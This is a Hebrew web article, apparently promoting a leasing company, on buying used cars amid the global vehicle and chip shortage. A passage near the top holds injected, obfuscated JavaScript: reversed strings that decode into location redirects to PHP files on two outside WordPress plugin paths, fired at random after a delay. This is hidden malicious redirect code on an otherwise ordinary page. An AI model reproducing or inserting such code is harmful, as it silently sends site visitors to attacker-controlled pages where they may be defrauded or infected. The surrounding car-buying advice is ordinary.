fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

רכישת רכבי יד שנייה לאור המחסור העולמי ברכבים

מה חשוב לקחת בחשבון וכיצד מומלץ לנהוג כאשר ניגשים לרכוש רכב משומש כיום?
רכב יד -2 | shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

בחודשים האחרונים מתחילים להרגיש בעולם הרכב, חלק מההשפעות של המצב הבלתי שגרתי השורר בעולם בשנתיים האחרונות ובפרט את המחסור העולמי בחומרי גלם ותוצרי ביניים שונים  הגורם לקווי ייצור רבים להיתקע ולהוריד משמעותית את תפוקתם.

המחסור בשבבים גרם לירידה משמעותית בהיקפי הייצור של רכבים בכל רחבי העולם, כך שקשה כיום הרבה יותר להזמין ולקבל רכב חדש בתוך פרק זמן קצר יחסית. מצב הגורם ליותר אנשים מבדרך כלל לשקול את האפשרות של רכישת רכב יד שנייה.

האפשרות של קניית רכב יד שנייה מליסינג הופכת מתבקשת יותר מתמיד

אחת ההשלכות הכלכליות הברורות והמתבקשות ביותר של מחסור עולמי בתחום מסוים, כמו שקורה כיום בעולם הרכב, היא כמובן עליית מחירים.

עלייה זו מחלחלת גם לשוק הרכבים המשומשים וכתוצאה מכך הביקוש לרכבים אלו עולה וגם המחירים.

המחסור ברכבים חדשים גם גורם למידה מסוימת של לחץ בקרב צרכנים רבים ויוצר אפקט מצטבר ברמת השוק כולו.

במצב זה, מתבקש יותר מתמיד לפנות לחפש רכב יד שנייה ממקורות בהם אספקת הרכבים רחבה יחסית, כגון חברות הליסינג השונות, המהוות תמיד שחקן אטרקטיבי ומשמעותי בשוק הרכבים המשומשים והופכות כיום ליעד מתבקש ביותר לפנות אליו.

חברות אלו מוציאות מדי שנה עשרות אלפי רכבים משומשים למכירה, הנמכרים במצב מצוין ובמחירים אטרקטיביים ביותר.

בניגוד לשוק הרכבים המשומשים הפרטיים, רכבי ליסינג משומשים נמכרים במצב מכאני מצוין, היות והם מתוחזקים באופן קפדני ונמכרים לרוב לאחר שלוש שנים בלבד על הכביש.

במצב העניינים הנוכחי יעשה בחכמה כל מי שמעוניין ברכב יד שנייה, אם יתחיל את חיפושו בחברות הליסינג השונות, שם ניתן למצוא רכב משומש אולם כמעט חדש ובמצב מצוין, במחיר אטרקטיבי של יד שנייה.

זו כאמור צריכה להיות אחת הכתובות הראשונות לפנות אליהן תמיד, לא רק בימי מחסור ברכבים חדשים, אך על אחת כמה וכמה כיום…

אם כבר משלמים יותר חשוב לוודא שמקבלים על כך תמורה

אז אחד הדברים הראשונים שחשוב שניקח בחשבון בבואנו לרכוש רכב יד שניה כיום, היא העובדה שהמחירים עשויים להיות גבוהים יותר מאשר בעבר.

העלייה במחירים אינה אמורה להיות משמעותית מההיצע בשוק הרכבים המשומשים וגם אם מבקשים מכם מחיר גבוה ממחיר המחירון הסטנדרטי, חשוב שתוודאו כי אתם מקבלים את התמורה המתבקשת בעבור תוספת המחיר.

למה הכוונה? ברכישת רכב משומש אנחנו בדרך כלל לא יכולים לדעת בוודאות בדיוק מה מצבו המכאני של הרכב ואילו בעיות יתגלו בו בחודשים הקרובים.

אם אנחנו כבר משלמים יותר, חשוב שזה יהיה עבור רכב יד שנייה במצב טוב ועם הוכחות לכך, בקשו לראות היסטוריית טיפולים, קחו אותו לבדיקה לפני קנייה במוסך והתעכבו על כל בעיה פוטנציאלית שאתם חושבים שאתם מזהים.

בעקבות המצב הנוכחי, שוק הרכבים המשומשים הוא שוק של מוכרים וידם במידה מסוימת על העליונה. אולם ניתן לכל הפחות לנצל את המצב על מנת להבטיח שאנחנו מקבלים רכב איכותי באמת, ולא חתול בשק.

להתרשמות ממגוון רכבים ופתרונות בתחום הרכב גלשו לאתר

 https://www.galileasing.co.il/

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות